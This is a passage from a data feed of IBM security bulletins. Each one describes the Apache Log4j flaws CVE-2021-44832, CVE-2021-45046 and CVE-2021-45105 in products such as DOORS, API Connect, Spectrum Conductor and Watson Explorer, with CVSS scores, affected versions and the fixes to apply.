Next, update your existing server Windows kcci_install dir \n\n\n\\- For IBM Engineering Requirements Management DOORS **9.6.*** \n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\<version>\\Server\\ibm\\Rational\\DOORS\\9.6\\kcci_install_ \n\\- For IBM Engineering Requirements Management DOORS **9.7.*** \n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\<version>\\Server\\ibm\\Rational\\DOORS\\9.7\\kcci_install_ \n5\\. Delete the old contents of the kcci_install directory \n6\\. Copy KC_CI.zip (129 MB) version 2.0 into that directory and unzip\n\n7\\. Next click on the KCCI contents [link](<https://download.boulder.ibm.com/ibmdl/pub/software/rationalsdp/documentation/kcci_content/doors_help/> \"link\" ) for the DOORS Help. Download the help contents zip for **_version 9.7.2 or higher_** and unzip it into the new kcci_install directory.\n\n**Additional Help**\n\nFor further information on installing IBM Engineering Requirements Management DOORS on your computer, review the following [information link](<https://www.ibm.com/docs/en/ermd/9.7.2?topic=applications-installing-help-your-computer> \"information link\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the 
Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYQBZ\",\"label\":\"Rational DOORS\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.6.1.7 - 9.7.2.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T16:56:55", "type": "ibm", "title": "Security Bulletin: IBM Engineering Requirements Management DOORS is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-28T16:56:55", "id": "05BBDE1FB03AC43275CE3464D408E5E21E63D250E7B0CF0E90D314FBD5991752", "href": "https://www.ibm.com/support/pages/node/6540618", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:34", "description": "## Summary\n\nApache Log4j is used by API Connect as part of its logging and analytics infrastructure. The fix includes Apache Log4j 2.17.1 which addresses CVE-2021-45105, CVE-2021-45046 and CVE-2021-44832.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAPI Connect| V10.0.0.0 - V10.0.4.0 \n---|--- \nAPI Connect| V10.0.1.0 - V10.0.1.5 \nAPI Connect| V2018.4.1.0 - 2018.4.1.17 \nAPI Connect| V5.0.0.0 - 5.0.8.12 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n**Affected Product**| **Addressed in VRMF**| **Remediation / Fix** \n---|---|--- \n \nIBM API Connect \n\nV10.0.1.0 - V10.0.4.0\n\n| V10.0.4.0-ifix1| \n\nAddressed in IBM API Connect V10.0.4.0-ifix1\n\nThe Analytics component is impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6541170> \n \nIBM API Connect \n\nV10.0.1.1 - V10.0.1.5\n\n| V10.0.1.5-ifix4| \n\nAddressed in IBM API Connect V10.0.1.5-ifix4\n\nThe analytics component is impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6540696> \n \nIBM API Connect \n\nV2018.4.1.0 - 2018.4.1.17\n\n| V2018.4.1.17-ifix2| \n\nAddressed in IBM API Connect V2018.4.1.17-ifix2\n\nThe Analytics component is impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6478999> \n \nIBM API Connect\n\nV5.0.0.0 - V5.0.8.12\n\n| V5.0.8.13| \n\nAddressed in IBM API Connect V5.0.8.13\n\nThe Analytics and Management components are impacted.\n\nFollow this link and find the appropriate package.\n\n<https://www.ibm.com/support/pages/node/6538964> \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff 
\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n15 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSMNED\",\"label\":\"IBM API Connect\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"all\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T00:06:28", "type": "ibm", "title": "Security Bulletin: API Connect is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105, CVE-2021-45046 and CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T00:06:28", "id": "256D7977365CD514F903FC0D0240FD89D47444B078D35EB3DA4DD54AAC8C8661", "href": "https://www.ibm.com/support/pages/node/6541728", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:33", "description": "## Summary\n\nApache Log4j is used by IBM Spectrum Conductor for generating logs in some of its components such as ELK, ascd, GUI and so on. This bulletin provides interim fixes which include Apache Log4j 2.17.1 to fix arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105) in IBM Spectrum Conductor.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Conductor| 2.4.1 \nIBM Spectrum Conductor| 2.5.0 \nIBM Spectrum Conductor| 2.5.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/Fix**_ \n---|---|---|--- \nIBM Spectrum Conductor| 2.4.1| P104516| \n\n[sc-2.4.1-build600955](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.4.1-build600955&includeSupersedes=0> \"sc-2.4.1-build600955\" ) \n \nIBM Spectrum Conductor| 2.5.0| P104513| \n\n[sc-2.5-build600954](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5-build600954&includeSupersedes=0> \"sc-2.5-build600954\" ) \n \nIBM Spectrum Conductor| 2.5.1| P104512| \n\n[sc-2.5.1-build600953](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5.1-build600953&includeSupersedes=0> \"sc-2.5.1-build600953\" ) \n \n## Workarounds and Mitigations\n\nAs detailed above in the **Remediation / Fixes **section.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web 
Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS4H63\",\"label\":\"IBM Spectrum Conductor\"},\"Component\":\"ASCD\\/PMC\\/Explorer\\/conductorspark\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.5.1;2.5.0;2.4.1\",\"Edition\":\"2.5.1;2.5.0;2.4.1\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T02:42:40", "type": "ibm", "title": "Security Bulletin: Due to the use of Apache Log4j, IBM Spectrum Conductor is vulnerable to arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": 
false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T02:42:40", "id": "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "href": "https://www.ibm.com/support/pages/node/6541736", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:56", "description": "## Summary\n\nApache Log4j is used by IBM Watson Explorer to log system events for diagnostics. This bulletin provides a remediation for the security vulnerabilities (CVE-2021-44832, CVE-2021-45105, and CVE-2021-45046) by upgrading IBM Watson Explorer to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer Deep Analytics Edition oneWEX| \n\n12.0.0.0, 12.0.0.1\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12 \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12 \nIBM Watson Explorer Content Analytics Studio| 12.0.0, 12.0.1, 12.0.2, 12.0.3 \nIBM Watson Explorer Content Analytics Studio| 11.0.0.0 - 11.0.0.3, \n11.0.1, 11.0.2.0 - 11.0.2.2 \n \n\n\n## Remediation/Fixes\n\n**Affected Products**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8\n\n| Upgrade to Version 12.0.3.9. \n\nSee [Watson Explorer Version 12.0.3.9 Foundational Components](<https://www.ibm.com/support/pages/node/6539806>) for download information and instructions. \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| 12.0.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8| \n\nUpgrade to Version 12.0.3.9. \n \nSee [Watson Explorer Version 12.0.3.9 Analytical Components](<https://www.ibm.com/support/pages/node/6539808>) for download information and instructions. \n \nIBM Watson Explorer Deep Analytics Edition oneWEX| 12.0.0.0, 12.0.0.1, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8| \n\nUpgrade to Version 12.0.3.9. 
\n \nSee [Watson Explorer Version 12.0.3.9 oneWEX](<https://www.ibm.com/support/pages/node/6539804>) for download information and instructions. \n \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12| \n\nUpgrade to Version 11.0.2.13. \n\nSee [Watson Explorer Version 11.0.2.13 Foundational Components](<https://www.ibm.com/support/pages/node/6539814>) for download information and instructions. \n \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12| \n\nUpgrade to Version 11.0.2.13. \n \nSee [Watson Explorer Version 11.0.2.13 Analytical Components](<https://www.ibm.com/support/pages/node/6539816>) for download information and instructions. \n \nIBM Watson Explorer Content Analytics Studio| 12.0.0, 12.0.1, 12.0.2, 12.0.3| \n\n 1. If you have not already installed, install Version 12.0.3. For information about Version 12.0.3, and links to the software and release notes, see the [download document](<https://www.ibm.com/support/docview.wss?uid=ibm10880811>).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.0&platform=All&function=all>): **12.0.3.0-WS-WatsonExplorer-DAEAnalytical-CAStudio-IF002.**\n 3. To apply the fix, follow the steps below. \n\n 1. Delete `%CA_STUDIO_INSTALL_DIR%\\plugins\\com.hp.hpl.jena_2.11.0` folder\n 2. Extract the interim fix zip file to the `%CA_STUDIO_INSTALL_DIR%\\plugins` folder\n 3. Run command `%CA_STUDIO_INSTALL_DIR%\\studio.exe -clean` in Command Prompt \nIBM Watson Explorer Content Analytics Studio| 11.0.0.0 - 11.0.0.3, \n11.0.1, 11.0.2.0 - 11.0.2.2| \n\n 1. If you have not already installed, install Version 11.0.2.2. 
\n\n * For information about Version 11.0.2, and links to the software and release notes, see the [download document](<https://www.ibm.com/support/pages/node/724425>).\n * For information about upgrading, see the [upgrade procedures](<http://www.ibm.com/support/docview.wss?uid=swg27049072>).For information about Version 11.0.2.2, see the [download document](<http://www.ibm.com/support/docview.wss?uid=swg24044331>).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.2&platform=All&function=all>): **11.0.2.2-WS-WatsonExplorer-AEAnalytical-CAStudio-IF002**.\n 3. To apply the fix, follow the steps below. \n\n 1. Delete `%CA_STUDIO_INSTALL_DIR%\\plugins\\com.hp.hpl.jena_2.11.0` folder\n 2. Extract the interim fix zip file to the `%CA_STUDIO_INSTALL_DIR%\\plugins` folder\n 3. Run command `%CA_STUDIO_INSTALL_DIR%\\studio.exe -clean` in Command Prompt \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS8NLW\",\"label\":\"Watson Explorer\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.0.0, 11.0.1, 11.0.2, 12.0.0, 12.0.1, 12.0.2, 12.0.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T12:14:51", "type": "ibm", "title": "Security Bulletin: Due to use of Apache Log4j, IBM Watson Explorer is vulnerable to arbitrary code execution (CVE-2021-44832, CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T12:14:51", "id": "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "href": "https://www.ibm.com/support/pages/node/6540528", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:43:48", "description": "## Summary\n\nThe Netcool/Omnibus 'Administrator GUI' and 'Operator GUI' desktop components use a version of Apache Log4j that contains known vulnerabilities. These vulnerabilities have been addressed by an upgrade to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. 